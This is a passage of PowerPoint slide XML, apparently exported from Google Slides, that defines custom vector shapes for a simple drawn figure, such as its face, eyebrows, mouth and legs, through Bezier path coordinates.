              <a:ext cx="384615" cy="318925"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9450" h="7836" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="587" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="587" y="1"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="599" y="1477"/>
                    <a:pt x="492" y="4513"/>
                    <a:pt x="182" y="6370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="7389"/>
                    <a:pt x="2797" y="7835"/>
                    <a:pt x="5353" y="7835"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7485" y="7835"/>
                    <a:pt x="9449" y="7525"/>
                    <a:pt x="9374" y="6978"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9255" y="6644"/>
                    <a:pt x="8909" y="2549"/>
                    <a:pt x="9016" y="382"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="587"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7" name="Google Shape;84;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2076873" y="2363963"/>
              <a:ext cx="343142" cy="217135"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8431" h="5335" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="8430" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="906"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="906"/>
                    <a:pt x="72" y="1441"/>
                    <a:pt x="13" y="2382"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="2382"/>
                    <a:pt x="2525" y="5335"/>
                    <a:pt x="4311" y="5335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6097" y="5335"/>
                    <a:pt x="8395" y="2596"/>
                    <a:pt x="8395" y="2596"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8395" y="2596"/>
                    <a:pt x="8347" y="775"/>
                    <a:pt x="8430" y="1"/>
                  </a:cubicBez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8" name="Google Shape;85;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2493640" y="1956032"/>
              <a:ext cx="179528" cy="223443"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4411" h="5490" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2769" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2657" y="0"/>
                    <a:pt x="2540" y="11"/>
                    <a:pt x="2417" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1215" y="273"/>
                    <a:pt x="405" y="1035"/>
                    <a:pt x="203" y="2559"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="4094"/>
                    <a:pt x="762" y="4904"/>
                    <a:pt x="1691" y="5380"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1833" y="5455"/>
                    <a:pt x="1976" y="5489"/>
                    <a:pt x="2117" y="5489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3105" y="5489"/>
                    <a:pt x="4040" y="3818"/>
                    <a:pt x="4227" y="2475"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4411" y="1081"/>
                    <a:pt x="3868" y="0"/>
                    <a:pt x="2769"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9" name="Google Shape;86;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2572150" y="1956113"/>
              <a:ext cx="78999" cy="49817"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1941" h="1224" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="820" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="433" y="0"/>
                    <a:pt x="155" y="140"/>
                    <a:pt x="155" y="140"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="1223"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="222" y="536"/>
                    <a:pt x="784" y="318"/>
                    <a:pt x="1254" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1565" y="318"/>
                    <a:pt x="1836" y="414"/>
                    <a:pt x="1941" y="533"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1941" y="533"/>
                    <a:pt x="1715" y="116"/>
                    <a:pt x="1072" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="984" y="6"/>
                    <a:pt x="900" y="0"/>
                    <a:pt x="820"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0" name="Google Shape;87;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1852779" y="1956520"/>
              <a:ext cx="179080" cy="223443"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4400" h="5490" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1625" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="544" y="0"/>
                    <a:pt x="1" y="1081"/>
                    <a:pt x="185" y="2475"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372" y="3818"/>
                    <a:pt x="1306" y="5489"/>
                    <a:pt x="2294" y="5489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2436" y="5489"/>
                    <a:pt x="2579" y="5455"/>
                    <a:pt x="2721" y="5380"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3638" y="4904"/>
                    <a:pt x="4400" y="4094"/>
                    <a:pt x="4209" y="2570"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3995" y="1034"/>
                    <a:pt x="3197" y="284"/>
                    <a:pt x="1971" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1850" y="11"/>
                    <a:pt x="1735" y="0"/>
                    <a:pt x="1625"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1" name="Google Shape;88;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1874798" y="1956764"/>
              <a:ext cx="79039" cy="49613"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1942" h="1219" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1099" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1026" y="0"/>
                    <a:pt x="949" y="5"/>
                    <a:pt x="870" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="124"/>
                    <a:pt x="1" y="540"/>
                    <a:pt x="1" y="540"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="420"/>
                    <a:pt x="383" y="321"/>
                    <a:pt x="699" y="321"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1167" y="321"/>
                    <a:pt x="1722" y="537"/>
                    <a:pt x="1942" y="1219"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1787" y="136"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1787" y="136"/>
                    <a:pt x="1491" y="0"/>
                    <a:pt x="1099"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2" name="Google Shape;89;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1948953" y="1581881"/>
              <a:ext cx="628530" cy="659544"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="15443" h="16205" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7728" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3453" y="0"/>
                    <a:pt x="1" y="2750"/>
                    <a:pt x="1" y="8477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="12752"/>
                    <a:pt x="3453" y="16204"/>
                    <a:pt x="7728" y="16204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11990" y="16204"/>
                    <a:pt x="15443" y="12752"/>
                    <a:pt x="15443" y="8477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15443" y="2870"/>
                    <a:pt x="11978" y="0"/>
                    <a:pt x="7728"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3" name="Google Shape;90;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1947976" y="1926891"/>
              <a:ext cx="629507" cy="577777"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="15467" h="14196" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="15467" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="4156"/>
                    <a:pt x="1" y="7608"/>
                    <a:pt x="1584" y="9859"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2489" y="11156"/>
                    <a:pt x="4775" y="13419"/>
                    <a:pt x="6537" y="14038"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6813" y="14132"/>
                    <a:pt x="7390" y="14196"/>
                    <a:pt x="7901" y="14196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8228" y="14196"/>
                    <a:pt x="8528" y="14170"/>
                    <a:pt x="8704" y="14109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10490" y="13514"/>
                    <a:pt x="12943" y="11192"/>
                    <a:pt x="13895" y="9847"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15467" y="7597"/>
                    <a:pt x="15467" y="4144"/>
                    <a:pt x="15467"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4" name="Google Shape;91;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2346794" y="2016511"/>
              <a:ext cx="137647" cy="28287"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3382" h="695" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2477" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2191" y="25"/>
                    <a:pt x="1918" y="37"/>
                    <a:pt x="1656" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1382" y="120"/>
                    <a:pt x="1120" y="168"/>
                    <a:pt x="846" y="239"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="584" y="322"/>
                    <a:pt x="334" y="406"/>
                    <a:pt x="72" y="513"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="537"/>
                    <a:pt x="1" y="584"/>
                    <a:pt x="36" y="620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="670"/>
                    <a:pt x="89" y="695"/>
                    <a:pt x="138" y="695"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="695"/>
                    <a:pt x="157" y="694"/>
                    <a:pt x="167" y="692"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="405" y="620"/>
                    <a:pt x="667" y="549"/>
                    <a:pt x="929" y="501"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="453"/>
                    <a:pt x="1441" y="394"/>
                    <a:pt x="1703" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1965" y="334"/>
                    <a:pt x="2215" y="299"/>
                    <a:pt x="2489" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2751" y="263"/>
                    <a:pt x="3013" y="263"/>
                    <a:pt x="3275" y="263"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3334" y="263"/>
                    <a:pt x="3382" y="215"/>
                    <a:pt x="3382" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3382" y="108"/>
                    <a:pt x="3346" y="61"/>
                    <a:pt x="3287" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3025" y="25"/>
                    <a:pt x="2739" y="1"/>
                    <a:pt x="2477"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5" name="Google Shape;92;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2023596" y="2020541"/>
              <a:ext cx="137159" cy="19780"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3370" h="486" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1280" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1143" y="0"/>
                    <a:pt x="1006" y="3"/>
                    <a:pt x="869" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="607" y="21"/>
                    <a:pt x="334" y="69"/>
                    <a:pt x="72" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="128"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="283"/>
                    <a:pt x="36" y="319"/>
                    <a:pt x="95" y="319"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="369" y="307"/>
                    <a:pt x="619" y="283"/>
                    <a:pt x="893" y="283"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1155" y="283"/>
                    <a:pt x="1405" y="283"/>
                    <a:pt x="1679" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1941" y="307"/>
                    <a:pt x="2203" y="343"/>
                    <a:pt x="2465" y="366"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2715" y="402"/>
                    <a:pt x="2989" y="438"/>
                    <a:pt x="3239" y="485"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3298" y="485"/>
                    <a:pt x="3358" y="462"/>
                    <a:pt x="3346" y="426"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3370" y="366"/>
                    <a:pt x="3346" y="307"/>
                    <a:pt x="3286" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3024" y="200"/>
                    <a:pt x="2762" y="140"/>
                    <a:pt x="2489" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2227" y="57"/>
                    <a:pt x="1965" y="21"/>
                    <a:pt x="1691" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1554" y="3"/>
                    <a:pt x="1417" y="0"/>
                    <a:pt x="128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6" name="Google Shape;93;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2191728" y="2273977"/>
              <a:ext cx="142979" cy="31909"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3513" h="784" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1818" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1245" y="0"/>
                    <a:pt x="655" y="66"/>
                    <a:pt x="405" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="402"/>
                    <a:pt x="1298" y="783"/>
                    <a:pt x="1739" y="783"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2203" y="783"/>
                    <a:pt x="3513" y="438"/>
                    <a:pt x="3096" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2893" y="60"/>
                    <a:pt x="2363" y="0"/>
                    <a:pt x="1818"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7" name="Google Shape;94;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2206258" y="2424565"/>
              <a:ext cx="115385" cy="10216"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2835" h="251" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1382" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1013" y="0"/>
                    <a:pt x="1" y="131"/>
                    <a:pt x="346" y="238"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="238"/>
                    <a:pt x="906" y="155"/>
                    <a:pt x="1370" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1834" y="155"/>
                    <a:pt x="2501" y="250"/>
                    <a:pt x="2501" y="250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2835" y="155"/>
                    <a:pt x="1775" y="12"/>
                    <a:pt x="1382"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8" name="Google Shape;95;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2151028" y="2349067"/>
              <a:ext cx="225844" cy="30077"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5549" h="739" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2311" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1737" y="1"/>
                    <a:pt x="1046" y="324"/>
                    <a:pt x="490" y="324"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310" y="324"/>
                    <a:pt x="144" y="290"/>
                    <a:pt x="1" y="200"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="200"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="526"/>
                    <a:pt x="1696" y="739"/>
                    <a:pt x="3033" y="739"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4187" y="739"/>
                    <a:pt x="5284" y="581"/>
                    <a:pt x="5549" y="200"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5549" y="200"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5406" y="290"/>
                    <a:pt x="5240" y="324"/>
                    <a:pt x="5061" y="324"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4507" y="324"/>
                    <a:pt x="3822" y="1"/>
                    <a:pt x="3249" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3097" y="1"/>
                    <a:pt x="2954" y="23"/>
                    <a:pt x="2822" y="81"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2739" y="81"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2608" y="23"/>
                    <a:pt x="2463" y="1"/>
                    <a:pt x="2311" y="1"/>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9" name="Google Shape;96;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2164093" y="2364940"/>
              <a:ext cx="202116" cy="38258"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4966" h="940" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="259"/>
                    <a:pt x="1409" y="931"/>
                    <a:pt x="2147" y="931"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2258" y="931"/>
                    <a:pt x="2362" y="916"/>
                    <a:pt x="2454" y="882"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2584" y="922"/>
                    <a:pt x="2712" y="939"/>
                    <a:pt x="2838" y="939"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3651" y="939"/>
                    <a:pt x="4389" y="211"/>
                    <a:pt x="4966" y="36"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4966" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2454" y="298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="1"/>
                  </a:ln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0" name="Google Shape;97;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2202880" y="2371737"/>
              <a:ext cx="114408" cy="12658"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2811" h="311" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2810" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2810" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2632" y="84"/>
                    <a:pt x="2370" y="131"/>
                    <a:pt x="2096" y="167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1917" y="179"/>
                    <a:pt x="1715" y="262"/>
                    <a:pt x="1524" y="262"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1322" y="262"/>
                    <a:pt x="1096" y="167"/>
                    <a:pt x="893" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="560" y="119"/>
                    <a:pt x="251" y="72"/>
                    <a:pt x="0" y="12"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="12"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="12"/>
                    <a:pt x="746" y="310"/>
                    <a:pt x="1482" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1496" y="310"/>
                    <a:pt x="1510" y="310"/>
                    <a:pt x="1524" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2274" y="310"/>
                    <a:pt x="2810" y="0"/>
                    <a:pt x="2810" y="0"/>
                  </a:cubicBez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1" name="Google Shape;98;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2625914" y="3196473"/>
              <a:ext cx="88238" cy="491900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2168" h="12086" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="453" y="7013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072" y="7299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1370" y="12085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1644" y="6406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2168" y="6299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2168" y="6299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1191" y="6478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="1"/>
                  </a:ln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2" name="Google Shape;99;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1769181" y="3196473"/>
              <a:ext cx="114408" cy="573300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2811" h="14086" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="386" y="6230"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="6230"/>
                    <a:pt x="369" y="6240"/>
                    <a:pt x="369" y="6240"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="410" y="6247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410" y="6247"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="401" y="6234"/>
                    <a:pt x="393" y="6230"/>
                    <a:pt x="386" y="6230"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2810" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1620" y="6478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410" y="6247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410" y="6247"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="447" y="6299"/>
                    <a:pt x="498" y="6496"/>
                    <a:pt x="512" y="7168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="608" y="9847"/>
                    <a:pt x="0" y="14086"/>
                    <a:pt x="0" y="14086"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1131" y="7299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155" y="7299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2810" y="1"/>
                  </a:ln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3" name="Google Shape;100;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2563888" y="2040768"/>
              <a:ext cx="37851" cy="96947"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="930" h="2382" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="274" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="2382"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2382"/>
                    <a:pt x="870" y="1655"/>
                    <a:pt x="906" y="1286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="929" y="917"/>
                    <a:pt x="274" y="0"/>
                    <a:pt x="274"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4" name="Google Shape;101;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1301539" y="4483026"/>
              <a:ext cx="1885590" cy="50427"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="46329" h="1239" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="144" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="1"/>
                    <a:pt x="1" y="84"/>
                    <a:pt x="1" y="155"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="1096"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1167"/>
                    <a:pt x="72" y="1239"/>
                    <a:pt x="144" y="1239"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46173" y="1239"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="46257" y="1239"/>
                    <a:pt x="46328" y="1167"/>
                    <a:pt x="46328" y="1096"/>
